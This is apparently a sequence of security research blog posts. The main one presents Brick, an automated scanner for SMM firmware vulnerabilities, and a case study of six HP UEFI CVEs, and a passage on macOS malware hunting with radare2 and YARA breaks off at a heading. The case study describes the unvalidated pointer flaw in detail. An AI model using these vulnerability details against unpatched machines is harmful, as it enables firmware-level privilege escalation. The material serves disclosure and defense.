Even in the face of these advancements, firmware security still bears lots and lots of issues, design flaws, and of course vulnerabilities to uncover. The ability of the security community to successfully pull this off depends on three fundamental pillars: knowledge, tooling, and diligence.

In this blog post, we focused on promoting knowledge by shedding light on unfamiliar territory. In the next post, we'll cover tooling and reveal:

  • How we automated the bug hunting process to the degree that finding SMM vulnerabilities is merely a matter of running a Python script
  • Some real-life examples of vulnerabilities we found, affecting most well-known OEMs in the industry.

As for diligence, unfortunately, no known recipe exists for producing such human qualities. It is, therefore, the responsibility of each and every one of us to just try our best and make sure that no stone is left unturned in this exciting and challenging domain.


Another Brick in the Wall: Uncovering SMM Vulnerabilities in HP Firmware

10 March 2022 at 13:00

By Assaf Carlsbad & Itai Liba

Executive Summary

  • SentinelLabs has discovered 6 high severity flaws in HP’s UEFI firmware impacting HP laptops and desktops.
  • Attackers may exploit these vulnerabilities to locally escalate to SMM privileges.
  • SentinelLabs findings were proactively reported to HP on Aug 18, 2021, and are tracked as:
    • CVE-2022-23956, marked with a CVSS score of 8.2
    • CVE-2022-23953, marked with a CVSS score of 7.9
    • CVE-2022-23954, marked with a CVSS score of 7.9
    • CVE-2022-23955, marked with a CVSS score of 7.9
    • CVE-2022-23957, marked with a CVSS score of 7.9
    • CVE-2022-23958, marked with a CVSS score of 7.9
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Hello and welcome back to yet another post in our blog post series covering UEFI & SMM security. This is the 6th (!) entry in the series, and it's a good spot to pause for a second and look back to better appreciate the vast distance we covered: from the baby steps of merely dumping and peeking at UEFI firmware, through the development of emulation infrastructure for it, and up to the point where we learned how to proactively hunt for SMM vulnerabilities. This post will continue where we left off last time and will further explore SMM vulnerabilities, albeit from a slightly different angle.

So far, the SMM bug hunting methodology we came up with is mostly manual and goes roughly as follows:

  1. Obtain a UEFI firmware image of interest, either by dumping it from the SPI flash or, when possible, downloading it directly from the vendor’s website.
  2. Extract the encapsulated SMM binaries via tools such as UEFITool or UEFIExtract.
  3. Open the SMM images one by one in IDA and analyze them using efiXplorer, while keeping a keen eye for vulnerable code patterns like the ones described in the previous part.

Needless to say, this process is extremely slow, inaccurate, and cumbersome. After doing it over and over again, we were so unsatisfied with it that we decided to take the intuition and rules of thumb we had developed and codify them into an automated tool. The outcome of this endeavor is an IDA-based vulnerability scanner for SMM binaries we named Brick. For the benefit of the firmware security community, we decided to publish it as an open-source project that is readily available on GitHub.

In this post, we’ll introduce readers to Brick, its internal architecture, and its bug-hunting capabilities. Afterward, we’ll present a case study where we demonstrate how Brick was used to discover 6 different vulnerabilities affecting the firmware of some HP laptops. By doing so, we hope to encourage more people in the community to contribute back to Brick, as well as to educate the readers about the potential strengths (and weaknesses) of automated vulnerability hunting.

Enjoy the read!

Automated SMM Vulnerability Hunting Using Brick

As mentioned, Brick was developed to pinpoint certain vulnerabilities and anti-patterns inside SMM binaries. To do so effectively, its execution lifecycle is split into three phases: a harvest phase, an analysis phase, and a summary phase. Each is described in detail below.

Figure 1 – Schematic overview of Brick’s execution lifecycle

Harvest Phase

In the vast majority of cases, it's most useful to give Brick a complete UEFI firmware image to scan. Doing so allows the researcher to "squeeze" the most vulnerabilities out of it while also gaining a bird's-eye view of the code quality of the firmware as a whole. Alas, a typical UEFI firmware image is a complex beast that contains much more than SMM binaries. Among other things, it usually includes:

  • Non-SMM executable modules for the different boot phases (PEI/DXE/etc.)
  • Microcode updates for the target CPU to be applied during early boot
  • Various Authenticated Code Modules (ACMs) signed by Intel, such as Boot Guard and BIOS Guard
  • A store for NVRAM variables
  • And much more
Figure 2 – SMM binaries are by no means the only file type stored inside a firmware image

Because of that, our first task is to separate the wheat from the chaff. In Brick’s terminology, this is accomplished by the harvest phase. During this phase, Brick will parse the firmware image and extract out of it just the SMM binaries we’re interested in.

To invoke Brick and kickstart the harvest phase, just pass the full path of the firmware image to the script:

Figure 3a – The harvest phase in action

Internally, the harvest phase is implemented by offloading most of the actual work to two external tools/libraries:

The reason we use two different solutions for this phase is that we encountered several cases where one of them struggled to properly parse a UEFI image, while the other succeeded without any hurdles. Thus, the strategy of using one of them and falling back to the other in case of failure gives us just the right amount of redundancy we need to successfully handle the vast majority of firmware images encountered in the wild.
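The fallback itself is a classic try-in-priority-order pattern; a hedged Python sketch (the parser callables below stand in for the two real tools, which are not named here):

```python
def extract_smm_binaries(image_path, parsers):
    """Try each parser in priority order; return the first successful result.

    `parsers` is a list of callables that either return a list of extracted
    SMM binaries or raise an exception on a malformed/unsupported image.
    """
    errors = []
    for parser in parsers:
        try:
            return parser(image_path)
        except Exception as exc:  # this parser choked on the image layout
            errors.append(f"{getattr(parser, '__name__', parser)}: {exc}")
    raise RuntimeError("all parsers failed: " + "; ".join(errors))
```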

At the end of the harvest phase — given that all went well — the output directory should contain several dozen SMM binaries awaiting further examination.

Figure 3b – The output directory at the end of the harvest phase

Note that in addition to full UEFI firmware images, Brick also supports other input formats in case you want to limit bug hunting to a narrower scope. These include

  • A single executable file (e.g. foo.efi)
  • A directory containing multiple SMM binaries
  • A UEFI capsule update package
  • Various other formats (see the source code for the complete list of supported options)

Analysis Phase

At this point, we have a directory filled with the SMM binaries we’re interested in analyzing. The rough idea is to open each SMM binary in IDA and — after the initial autoanalysis completes — run some custom IDAPython scripts on top of it to do the actual bug hunting. This must be done intelligently, as a naive solution would suffer from two severe downsides:

  1. Analyzing SMM binaries one at a time is not very efficient performance-wise. We should strive to parallelize the whole process and take advantage of multiple CPU cores.
  2. IDA is mostly used interactively, and while a batch mode exists for non-interactive usage, it’s often overlooked as it’s not very convenient to use.

Luckily for us, it didn’t take us too long to bump into a project called idahunt that solves these exact two problems. Put in the author’s own words:

“idahunt is a framework to analyze binaries with IDA Pro and hunt for things in IDA Pro. It is a command-line tool to analyze all executable files recursively from a given folder. It executes IDA in the background so you don’t have to manually open each file. It supports executing external IDA Python scripts.”

Figure 4 – Overview of using idahunt to speed up the scanning process
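Driving IDA non-interactively boils down to spawning idat64 with the -A (autonomous, no dialogs) and -S (run an IDAPython script after autoanalysis) switches, one process per binary. A simplified sketch of that kind of scheduling (the paths and worker count are illustrative; the real idahunt adds IDB caching, logging and more):

```python
import subprocess
from concurrent.futures import ThreadPoolExecutor

def ida_batch_cmd(binary, script, ida="idat64"):
    """Build a headless IDA invocation for one binary."""
    return [ida, "-A", f"-S{script}", binary]

def scan_all(binaries, script, workers=8):
    """Analyze the binaries concurrently, 'workers' IDA instances at a time."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        cmds = [ida_batch_cmd(b, script) for b in binaries]
        return list(pool.map(lambda c: subprocess.run(c).returncode, cmds))
```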

The IDAPython scripts executed by idahunt on behalf of Brick are known as Brick modules and come in three different flavors:

  • Processing modules, which do some initial preparatory work and handle some of the shenanigans of UEFI.
  • Hunting modules, which employ a wide range of heuristics to pinpoint potential vulnerabilities. Usually, a dedicated module exists for each of the vulnerability classes described earlier.
  • Informational modules, which emit valuable information about the target image that is not necessarily tied to vulnerabilities. This includes, for example, the list of unrecognized UEFI protocols consumed by the image.
Figure 5 – Overview of the various Brick modules

While developing these Brick modules, we found the raw IDAPython API to be a bit rough at times, so for the most part the modules were developed on top of a wrapper framework called Bip. One of the major highlights of this framework is that it also exposes wrapper functions for the Hex-Rays Decompiler API, which allows writing analysis routines in a fairly high-level notion.

Figure 6 – The analysis phase, running 8 concurrent IDA instances in the background

Summary Phase

After all SMM images in the input directory have been scanned, Brick collects the output emitted by the individual modules and merges it into a single, browsable HTML report.

Note that in addition to the scan’s verdict, the report file also includes links to some useful resources such as the annotated IDB file (necessary for validating the correctness of the results), the raw IDA log file (useful for troubleshooting and debugging), as well as a separate report file generated by efiXplorer.

Figure 7 – Portion of a Brick report produced for some firmware image

Case Study – Using Brick to Uncover HP Firmware Vulnerabilities

Throughout the past year, we have been using Brick extensively to review firmware images from almost all leading manufacturers in the industry. So far, this campaign is definitely paying off and has already given birth to no fewer than 13 different CVEs (see Appendix A). In this case study, we would like to put a spotlight on several such vulnerabilities found while auditing one particular firmware image from HP (version 01.04.01 Rev.A for the HP ProBook 440 G8 Notebook). After Brick’s scan completed, we opened the resulting report file and were faced with a rather intriguing entry:

Figure 8 – The SMM module 0155.efi does not validate certain nested pointers

This entry immediately drew our attention because, if confirmed correct, it means that the SMI handler installed by the SMM image 0155.efi does not validate certain pointers that are nested within its communication buffer. As we explained in the previous post, that in turn implies the handler can be exploited by attackers to corrupt or disclose the contents of SMRAM.

In this section, we’ll elaborate on how Brick managed to find such a vulnerability in a completely automated fashion. For that, we’ll walk you through the internal workings of some of the Brick modules involved in reaching this verdict. Note that due to the medium of a written article, the case study will be presented using snapshots of the IDA database before and after each module invocation. In reality, however, all modules run automatically one after another, without any user interaction.


The Preprocessor

The first Brick module that is called to handle any input file is called the preprocessor. The preprocessor sets up the ground for the next modules in the chain and takes care of the following:

  • Making the .text section read-write, which prevents the decompiler from performing some excessive optimizations.
  • Discovering functions that the initial auto-analysis missed (based on codatify).
  • Scraping the edk2 and edk2-platforms repositories for protocol header files and attempting to import them into the IDA database. The net result is that the database is filled with a plethora of UEFI protocol definitions:
Figure 9 – Some UEFI protocols that were imported from EDK2 by the preprocessor


efiXplorer

Right after the preprocessor, Brick moves on to load and run the efiXplorer plugin. As we mentioned countless times throughout the series, efiXplorer has tons of functionality and serves as the de-facto standard way of analyzing UEFI binaries with IDA. Among other things, it takes care of the following:

  • Locating and renaming known UEFI GUIDs
  • Locating and renaming calls to UEFI boot/runtime services
  • Applying correct types for interface pointers
Figure 10 – Pseudocode from a decompiled function before efiXplorer was invoked
Figure 11 – The same function, after efiXplorer analysis

Last but not least, efiXplorer is also capable of locating and renaming SMI handlers. In its recent editions, it prefixes all CommBuffer-based SMIs with ‘SmiHandler’, and all legacy software SMIs with ‘SwSmiHandler’. As can be seen, in the case of 0155.efi, only one SMI handler seems to exist:

Figure 12 – the SMI handler found by efiXplorer


The Postprocessor

Following efiXplorer, control is passed to the postprocessor. The postprocessor is a module that is in charge of completing the analysis performed earlier by efiXplorer. Among other things, this includes:

  • Locating SMI handlers that efiXplorer might have missed
  • Fixing the function prototype for some UEFI services such as GetVariable()/SetVariable()
  • Renaming function arguments

In the context of this case study, the most important feature of the postprocessor is the handling of calls to EFI_SMM_ACCESS2_PROTOCOL. In a nutshell, this protocol is used to control the visibility of SMRAM on the platform. As such, it exposes the respective methods to open, close, and lock SMRAM.

Figure 13 – interface definition for EFI_SMM_ACCESS2_PROTOCOL, source: Step to UEFI

In addition to those, this protocol also exposes a method called GetCapabilities(), which clients can use to query the memory controller for the exact location of SMRAM in physical memory. Upon return, this function fills in an array of EFI_SMRAM_DESCRIPTOR structures that informs the caller what regions of SMRAM exist, their size, their state (open vs. closed), etc.

Figure 14 – documentation of the GetCapabilities() function, source: Step to UEFI

In EDK2 and its derived implementations, the common practice is to store these EFI_SMRAM_DESCRIPTORs as global variables so that they can be consumed by other functions in the future. As part of its operation, the postprocessor scans the input file for calls to GetCapabilities() and marks the SMRAM descriptors in a way that makes them easy to recover afterward. This includes both retyping them as 'EFI_SMRAM_DESCRIPTOR *' and renaming them to have a unique, known prefix. The significance of this operation will become clear shortly.

Figure 15 – Calling GetCapabilities(), before running the postprocessor
Figure 16 – Same code, after applying the postprocessor
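These descriptors are exactly what validation routines such as SmmIsBufferOutsideSmmValid() consult: conceptually, the check is a range-overlap test against the known SMRAM regions. A Python rendering of the idea (the real function lives in EDK2 and is written in C; field names follow EFI_SMRAM_DESCRIPTOR):

```python
MAX_ADDRESS = 2**64 - 1  # top of the 64-bit physical address space

def is_buffer_outside_smm_valid(buffer, length, smram_descriptors):
    """Return True iff [buffer, buffer+length) overlaps no SMRAM region."""
    # Reject ranges that would wrap around the physical address space.
    if length != 0 and buffer > MAX_ADDRESS - (length - 1):
        return False
    for desc in smram_descriptors:
        start = desc["CpuStart"]
        stop = start + desc["PhysicalSize"]
        if buffer < stop and buffer + length > start:  # ranges overlap
            return False
    return True
```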

Reconstructing the CommBuffer

Initially, the type assigned to the CommBuffer in the SMI handler’s signature is VOID *. This is adequate, as the structure of the CommBuffer is not known in advance and it’s the responsibility of the handler to correctly interpret it. Still, figuring out the internal layout of the Communication Buffer will be of great aid because it will let us know whether or not it contains nested pointers.

Usually, such tasks are completed manually as part of the reverse engineering process, but in Brick we needed to pull this off automatically. The two most prominent and successful IDA plugins for doing so are HexRaysPyTools and HexRaysCodeXplorer. Based on our experience, HexRaysPyTools produces more accurate results, while HexRaysCodeXplorer is better suited for non-interactive use. Eventually, the scriptability of HexRaysCodeXplorer tipped the scale in its favor, and so it was incorporated into Brick.

Figure 17 – HexRaysCodeXplorer can be invoked from an IDAPython script

At this stage, all SMI handlers present in the image have already been identified, so Brick can iterate over them and invoke HexRaysCodeXplorer on the associated CommBuffer to reconstruct its internal structure. Doing so for the SMI handler from 0155.efi yields the following structure, which holds two members (field_18 and field_28) that are presumably pointers themselves:

Figure 18 – the reconstructed structure of the Comm Buffer

How did HexRaysCodeXplorer get to this conclusion? To answer this question, let’s take a closer look at the handler’s code itself:

Figure 19 – The SMI handler forwards CommBuffer->field_18 to sub_17AC

As can be seen, during the course of its operation the handler passes CommBuffer->field_18 as the 2nd argument to the function sub_17AC. This function, in turn, forwards it to CopyMem(), where it is used as the destination buffer. Based on the signature of CopyMem(), we know the destination buffer is in fact a pointer. That means the argument of sub_17AC is itself a pointer, and therefore — due to the transitivity of assignments — CommBuffer->field_18 must be a pointer as well! The same logic also applies to field_28, even though we won’t show it here.

Figure 20 – The 2nd argument is forwarded as the destination buffer for CopyMem()
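This “transitivity of assignments” reasoning can be phrased as a tiny fixed-point propagation pass. The following toy illustration is not HexRaysCodeXplorer’s actual implementation, just the underlying idea, with hypothetical call-graph facts:

```python
def propagate_pointerness(seeds, flows):
    """seeds: values known to be pointers (e.g. CopyMem's destination arg).
    flows: (src, dst) pairs meaning 'src is assigned/forwarded to dst'.
    Returns every value that must also be a pointer."""
    pointers = set(seeds)
    changed = True
    while changed:
        changed = False
        for src, dst in flows:
            if dst in pointers and src not in pointers:
                pointers.add(src)  # whatever feeds a pointer is a pointer too
                changed = True
    return pointers
```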

Resolving SmmIsBufferOutsideSmmValid

Now that it knows the CommBuffer does contain some nested pointers, Brick moves on and checks if these pointers are being sanitized properly. That is a two-fold operation:

  1. Locating the function SmmIsBufferOutsideSmmValid() in the input binary.
  2. If found, check that it is aptly used to sanitize the nested pointers.

Let’s start with resolving SmmIsBufferOutsideSmmValid(). As we mentioned in the previous part, SmmIsBufferOutsideSmmValid() is statically linked into the binary, so locating it is not a trivial problem. To pull this off, we compiled a heuristic comprising three conditions. Brick will iterate over all of the functions in the IDA database and try to find a function that matches all three. The heuristic goes as follows:

  1. The function at hand must receive two integer arguments – the first used as the buffer’s address and the second as its size. With the help of Bip’s API, checking for these properties is rather trivial:
    def check_arguments(f: BipFunction):
        # The arguments of the function must match (EFI_PHYSICAL_ADDRESS, UINT64)
        if (f.type.nb_args == 2 and \
            isinstance(f.type.get_arg_type(0), BTypeInt) and \
            isinstance(f.type.get_arg_type(1), BTypeInt)):
            return True
        return False

    Figure 21 – Matching the arguments of SmmIsBufferOutsideSmmValid

  2. The function at hand must return a BOOLEAN value. From the perspective of the decompiler, BOOLEAN values are just plain integers, so if we want to make this distinction we must go over all the return statements in the function and check if the returned value is a member of the set {0,1}. In Bip, this can also be accomplished very easily:
    def check_return_type(f: BipFunction):
        if not isinstance(f.type.return_type, BTypeInt):
            # Return type is not something derived from an integer.
            return False
        def inspect_return(node: CNodeStmtReturn):
            if not isinstance(node.ret_val, CNodeExprNum) or node.ret_val.value not in (0, 1):
                # Not a boolean value.
                return False
        # Run 'inspect_return' on all return statements in the function.
        return f.hxcfunc.visit_cnode_filterlist(inspect_return, [CNodeStmtReturn])

    Figure 22 – Checking the function actually returns a BOOLEAN value

  3. Lastly, we know that SmmIsBufferOutsideSmmValid() uses an array of EFI_SMRAM_DESCRIPTORS to keep track of active SMRAM ranges, so we expect the candidate function to reference at least one of them. Because global EFI_SMRAM_DESCRIPTORS were already marked earlier by the postprocessor, checking for xrefs between the function and the descriptors becomes straightforward:
    def references_smram_descriptor(f: BipFunction):
        # The function must reference at least one SMRAM descriptor.
        for smram_descriptor in BipElt.get_by_prefix('gSmramDescriptor'):
            if f in smram_descriptor.xFuncTo:
                return True
        # No xref to any SMRAM descriptor.
        return False

    Figure 23 – Checking the function references an EFI_SMRAM_DESCRIPTOR

Are these heuristics bulletproof? Do they guarantee a match for SmmIsBufferOutsideSmmValid() in every binary? Of course not! But more often than not they do the trick, and that’s what matters. In the HP case, the heuristics didn’t fail and managed to find a proper match:

Figure 24 – Matching SmmIsBufferOutsideSmmValid()
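Put together, the three predicates form a conjunction that Brick evaluates over every function in the database. Sketched here over toy records (plain dicts stand in for Bip’s BipFunction objects, and the predicate bodies are simplified for illustration):

```python
def find_smm_is_buffer_outside_smm_valid(functions, checks):
    """Return the functions matching every heuristic; ideally exactly one."""
    return [f for f in functions if all(check(f) for check in checks)]

# Toy predicates mirroring the three conditions described above.
def two_int_args(f):
    return f["args"] == ["int", "int"]

def returns_boolean(f):
    return set(f["return_values"]) <= {0, 1}

def touches_smram_descriptor(f):
    return f["refs_smram_descriptor"]
```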

Nested Pointers Validation

Once SmmIsBufferOutsideSmmValid() is matched, Brick verifies it is being used properly by the SMI handler. For that, it iterates over all calls to SmmIsBufferOutsideSmmValid() and tries to deduce if all nested pointers are being covered by it. In 0155.efi, it notices there is only one call to SmmIsBufferOutsideSmmValid() that is used to validate field_28. That implies no validation takes place over the second nested pointer, namely field_18, so it flags the handler as vulnerable.

Figure 25 – SmmIsBufferOutsideSmmValid validates one field while neglecting the other one

To be fair, we were quite lucky to encounter such a clear-cut case as the one above. If the control flow was a bit more convoluted, there is a decent chance Brick’s verdict would become more ambiguous.


We already saw that depending on the exact flow the handler takes, it might end up calling sub_17AC. This function receives an argument derived from CommBuffer->field_18 and later forwards it as the destination address for CopyMem(). The contents of the CommBuffer are fully controllable by the attacker, who can leverage the missing validation to craft a buffer whose field_18 points to an arbitrary SMRAM address of their choice. As a result, the SMRAM region pointed to by that address will get corrupted by the time CopyMem() gets called.

Figure 26 – CommBuffer->field18 is passed from SmiHandler through sub_17AC and ends up at CopyMem

How to cause the handler to actually call sub_17AC, and how to promote this memory corruption into an arbitrary code execution in SMM are left as exercises to the diligent reader.

Low SMRAM Corruption

In addition to the nested pointer vulnerability present in 0155.efi, the HP firmware image also suffered from 5 additional, less severe issues that enable attackers to corrupt the low portion of SMRAM. All five vulnerabilities are isomorphic to each other, so we’ll focus on the simplest case found in 017D.efi:

Figure 27 – Low SMRAM corruption discovered in 017D.efi

As we mentioned in the previous post, these vulnerabilities arise when an SMI handler writes data to the communication buffer without first validating its size. Attackers can place the CommBuffer just below SMRAM, which will cause unintended corruption once the handler performs the write to it.

We also noted that SMI handlers can shield themselves from these problems by performing one or both of the following actions:

  1. Calling SmmIsBufferOutsideSmmValid on the CommBuffer with the exact size expected by the handler.
  2. Dereferencing the provided CommBufferSize argument (a pointer to an integer value holding the size of the buffer), then comparing the result against the expected size.
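In pure-Python terms (real handlers are C, and the names and expected size here are illustrative), the safe pattern amounts to gating any write on both guards:

```python
EXPECTED_SIZE = 0x30  # hypothetical size of the layout the handler expects

def validate_comm_buffer(addr, size, outside_smram):
    """Model of the two guards an SMI handler should apply before writing.
    `outside_smram(addr, size)` plays the role of SmmIsBufferOutsideSmmValid."""
    if size < EXPECTED_SIZE:  # guard 2: dereference and check *CommBufferSize
        return False
    if not outside_smram(addr, EXPECTED_SIZE):  # guard 1: no SMRAM overlap
        return False
    return True  # only now is it safe to write to the buffer
```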

Therefore, to detect this class of vulnerabilities, Brick searches for SMI handlers that omit both checks. Unlike the previous case, this time the heuristics employed to resolve SmmIsBufferOutsideSmmValid() bore no fruit, so Brick simply assumes it’s absent from the binary and moves on to check if CommBufferSize is being dereferenced. This is achieved by traversing the AST associated with the handler, looking for nodes that correspond to a dereference operation (cot_ptr in the Hex-Rays terminology). The child node of a dereference operation in the tree represents the variable being dereferenced, so Brick can check if it’s CommBufferSize.

Figure 28 – The portion of the AST that corresponds to dereferencing CommBufferSize

If such a pair of nodes is found, it tells us that the C source code for the handler contained the expression: *CommBufferSize, so we can assume the programmer intended to compare that value against some anticipated size.

Figure 29 – The corresponding C source code for the dereference operator

Using Bip, implementing this heuristic is easy and only takes a handful of Python lines:

def dereferences_CommBufferSize(handler: BipFunction):
    # CommBufferSize is the 3rd argument of the SMI handler
    CommBufferSize = handler.hxcfunc.args[2]
    if not CommBufferSize._lvar.used:
        # CommBufferSize is not touched at all.
        return False
    def inspect_dereference(node: CNodeExprPtr):
        child = node.ops[0].ignore_cast
        if isinstance(child, CNodeExprVar) and child.lvar == CommBufferSize:
            # Returning False aborts the traversal, which in turn makes
            # visit_cnode_filterlist() return False as well.
            return False
    # Run 'inspect_dereference' on all dereference expressions in the function.
    return not handler.hxcfunc.visit_cnode_filterlist(inspect_dereference, [CNodeExprPtr])

Figure 30 – Implementing the heuristic in Python

In 017D.efi, this heuristic yields no results, so Brick now knows CommBufferSize is not being dereferenced and as a result marks the handler as vulnerable.

Figure 31 – Brick’s assessment of 017D.efi


Conclusion

As can be judged by the number of CVEs it has already generated, we believe Brick is a very promising project that takes a big step in the right direction of harnessing automation to streamline the bug hunting process. This feeling was reinforced recently when a related project called FwHunt was released. FwHunt attempts to solve the same set of problems as Brick, only using strict rule-sets rather than more relaxed heuristics.

Using automation, rules, heuristics, and other static code analysis techniques to crack through complex problems is very much desirable, but it’s always important to remember that reality is more complex than how we describe it. As such, occasional edge conditions that cause Brick and other automated tools to generate false positives and false negatives from time to time are inevitable.

That is perfectly acceptable, as long as we keep in mind that these tools were never intended to fully replace a human analyst, but rather to empower them to handle ever larger quantities of data. Eventually, it’s not the tool itself that makes the difference, but rather the human being who chooses how to use it, on what targets, and how to interpret its findings.

If you’re interested in learning more about the subject, come attend the upcoming Insomnihack conference, where we will be delivering a talk about some more SMM vulnerabilities, found this time in the Intel codebase.

See you there!

Appendix A – List of CVEs by Brick

CVE ID           CVSS score   Vendor
CVE-2021-36342   7.5          Dell
CVE-2021-44346   ?            Gigabyte
CVE-2021-0157    8.2          Intel
CVE-2021-0158    8.2          Intel
CVE-2021-42055   6.8          ASUS
CVE-2021-3599    6.7          Lenovo
CVE-2021-3786    5.5          Lenovo
CVE-2022-23956   8.2          HP
CVE-2022-23953   7.9          HP
CVE-2022-23954   7.9          HP
CVE-2022-23955   7.9          HP
CVE-2022-23957   7.9          HP
CVE-2022-23958   7.9          HP

Appendix B – References and Further Reading

The Art and Science of macOS Malware Hunting with radare2 | Leveraging Xrefs, YARA and Zignatures

21 March 2022 at 16:24

Welcome back to our series on macOS reversing. Last time out, we took a look at challenges around string decryption, following on from our earlier posts about beating malware anti-analysis techniques and rapid triage of Mac malware with radare2. In this fourth post in the series, we tackle several related challenges that every malware hunter faces: you have a sample, you know it’s malicious, but

  • How do you determine if it’s a variant of other known malware?
  • If it is unknown, how do you hunt for other samples like it?
  • How do you write robust detection rules that survive malware authors’ refactoring and recompilation?

The answer to those challenges is part Art and part Science: a mixture of practice, intuition and occasionally luck(!) blended with a solid understanding of the tools at your disposal. In this post, we’ll get into the tools and techniques, offer you tips to guide your practice, and encourage you to gain experience (which, in turn, will help you make your own luck) through a series of related examples.

As always, you’re going to need a few things to follow along, with the second and third items in this list installed in the first.

  1. An isolated VM – see instructions here for how to get set up
  2. Some samples – see Samples Used below
  3. Latest version of r2 – see the github repo here.

What are Zignatures and Why Are They Useful?

By now you might have wondered more than once if this post just had a really obvious typo: Zignatures, not signatures? No, you read that right the first time! Zignatures are r2’s own format for creating and matching function signatures. We can use them to see if a sample contains functions similar to those found in other malware. Similarly, Zignatures can help analysts identify commonly re-used library code, encryption algorithms and deobfuscation routines, saving us lots of reversing time down the road (for readers familiar with IDA Pro or Ghidra, think FLIRT or Function ID).

What’s particularly nice about Zignatures is that you can search not only for exact matches but also for matches above a certain similarity score. This allows us to find functions that have been modified from one instantiation to the next but are otherwise the same.
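To get a feel for why fuzzy matching is useful, here is a stdlib illustration using difflib; this is not r2’s actual scoring algorithm, just the same idea of grading a candidate against a signature instead of demanding byte equality:

```python
from difflib import SequenceMatcher

def match_score(signature_bytes: bytes, candidate_bytes: bytes) -> float:
    """Return a similarity score in [0.0, 1.0], 1.0 being an exact match."""
    return SequenceMatcher(None, signature_bytes, candidate_bytes).ratio()
```

A recompiled function whose last instruction changed still scores high, whereas an exact-match scheme would reject it outright.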

Zignatures can help us to answer the question of whether an unknown sample is a variant of a known one. Once you are familiar with Zignatures, they can also help you write good detection rules, since they will allow you to see what is constant in a family of malware and what is variant. Combined with YARA rules, which we’ll take a look at later in this post, you can create effective hunting rules for malware repositories like VirusTotal to find variants or use them to help inform the detection logic in malware hunting software.

Create and Use A Zignature

Let’s jump into some malware and create our first Zignature. Here’s a recent sample of WizardUpdate (you might remember we looked at an older sample of WizardUpdate in our post on string decryption).

Loading the sample into r2, analyzing its functions, and displaying its hashes

We’ve loaded the sample into r2 and run some analysis on it. We’ve been conveniently dropped at the main() function, which looks like this.

WizardUpdate main() function

That main function contains some malware-specific strings, so it should make a nice target for a Zignature. To create one, we use the zaf command, supplying the function name and the signature name as parameters. Our sample file happened to be called “WizardUpdateB1”, so we’ll call this signature “WizardUpdateB1_main”. In r2, the full command we need, then, is:

> zaf main WizardUpdateB1_main

We can look at the newly-created Zignature in JSON format with zj~{} (if you’re not sure why we’re using the tilde, review the earlier post on grepping in r2).

An r2 Zignature viewed in JSON format

To see that the Zignature works, try zb and note the output:

zb returns how close the match was to the Zignature and the function at the current address

The first entry in the row is the most important, as that gives us the overall (i.e., average) match (between 0.00000 and 1.00000). The next two show us the match for bytes and graph, respectively. In this case, it’s a perfect match to the function, which is of course what we would expect as this is the sample from which we created the rule.

You can also create Zignatures for every function in the binary in one go with zg.

Create function signatures for every function in a binary with one command

Beware of using zg on large files with thousands of functions though, as you might get a lot of errors or junk output. For small-ish binaries with up to a couple of hundred functions it’s probably fine, but for anything larger than that I typically go for a targeted approach.

So far, we have created and tested a Zignature, but its real value lies in applying it to other samples.

Create A Reusable and Extensible Zignatures File

At the moment, your Zignatures aren’t much use because we haven’t learned yet how to save and load Zignatures between samples. We’ll do that now.

We can save our generated Zignatures with zos <filename>. Note that if you just provide the bare filename it’ll save in the current working directory. If you give an absolute path to an existing file, r2 will nicely merge the Zignatures you’re saving with any existing ones in that file.

Radare2 does have a default location from which it is supposed to autoload Zignatures if the autoload variable is set, namely ~/.local/share/radare2/zigns/ (in some documentation, it’s ~/.config/radare2/zigns/). However, I’ve never quite been able to get autoload to work from either location, but if you want to try it, create the above directory and add the following line to your radare2 config file (~/.radare2rc).

e zign.autoload = true

In my case, I load my zigs file manually, which is a simple command: zo <filename> to load, and zb to run the Zignatures contained in the file against the function at the current address.

Sample WizardUpdate_B2’s main function doesn’t match our Zignature

Sample WizardUpdate_B5’s main function is a perfect match for our Zignature

As you can see, Sample B5 above is a perfect match to B1, whereas B2 is way off, with a match of only around 46.6%.

When you’ve built up a collection of Zignatures, they can be really useful for checking a new sample against known families. I encourage you to create Zignatures for all your samples as they will pay dividends down the line. Don’t forget to back them up too. I learned the hard way that not having a master copy of my Zigs outside of my VMs can cause a few tears!

Creating YARA Rules Within radare2

Zignatures will help you in your efforts to determine if some new malware belongs to a family you’ve come across before, but that’s only half the battle when we come across a new sample. We also want to hunt – and detect – files that are like it. For that, YARA is our friend, and r2 handily integrates the creation of YARA strings to make this easy.

In this next example, we can see that a different WizardUpdate sample doesn’t match our earlier Zignature.

The output from zb shows that the current function doesn’t match any of our previous function signatures

While we certainly want to add a function signature for this sample’s main() to our existing Zigs, we also want to hunt for this on external repos like VirusTotal and elsewhere where YARA can be used.

Our main friend here is the pcy command. Since we’ve already been dropped at main()’s address, we can just run the pcy command directly to create a YARA string for the function.

Generating a YARA string for the current function

However, this is far too specific to be useful. Fortunately, the pcy command can be tailored to give us however many bytes we wish at whatever address.

We know that WizardUpdate makes plenty of use of ioreg, so let’s start by searching for instances of that in the binary.

Searching for the string “ioreg” in a WizardUpdate sample

Lots of hits. Let’s take a closer look at the hex of the first one.

A URL embedded in the WizardUpdate sample

That URL address might be a good candidate to include in a YARA rule, let’s try it. To grab it as YARA code, we just seek to the address and state how many bytes we want.

Generating a YARA string of 48 bytes from a specific address

This works nicely and we can just copy and paste the code into VT’s search with the content modifier. Our first effort, though, only gives us 1 hit on VirusTotal, although at least it’s different from our initial sample (we’ll add that to our collection, thanks!).

Our string only found a single hit on VirusTotal

But note how we can iterate on this process, easily generating YARA strings that we can use both for inclusion and exclusion in our YARA rules.

This time we had better success with 46 hits for one string

This string gives us lots of hits, so let’s create a file and add the string.

pcy 32 >> WizardUpdate_B.yara
Outputting the YARA string to a file

From here on in, we can continue to append further strings that we might want to include or exclude in our final YARA rule. When we are finished, all we have to do is open our new .yara file and add the YARA meta data and conditional logic, or we can paste the contents of our file into VTs Livehunt template and test out our rule there.
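A sketch of what the final rule file might look like once the metadata and condition are added (the rule name, byte patterns and URL below are placeholders, not the actual strings generated above):

```yara
rule WizardUpdate_B
{
    meta:
        description = "Hunts WizardUpdate.B-style samples"
        author      = "your_name_here"

    strings:
        // byte patterns pasted from r2's pcy output (placeholders here)
        $ioreg_cmd = { 69 6f 72 65 67 20 2d 72 64 31 }   // "ioreg -rd1"
        $url       = "hxxps://example[.]com/update" ascii

    condition:
        uint32(0) == 0xfeedfacf and any of them
}
```

The uint32(0) check anchors the rule to 64-bit Mach-O files, which keeps the byte patterns from matching unrelated file types.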

Xrefs For the Win

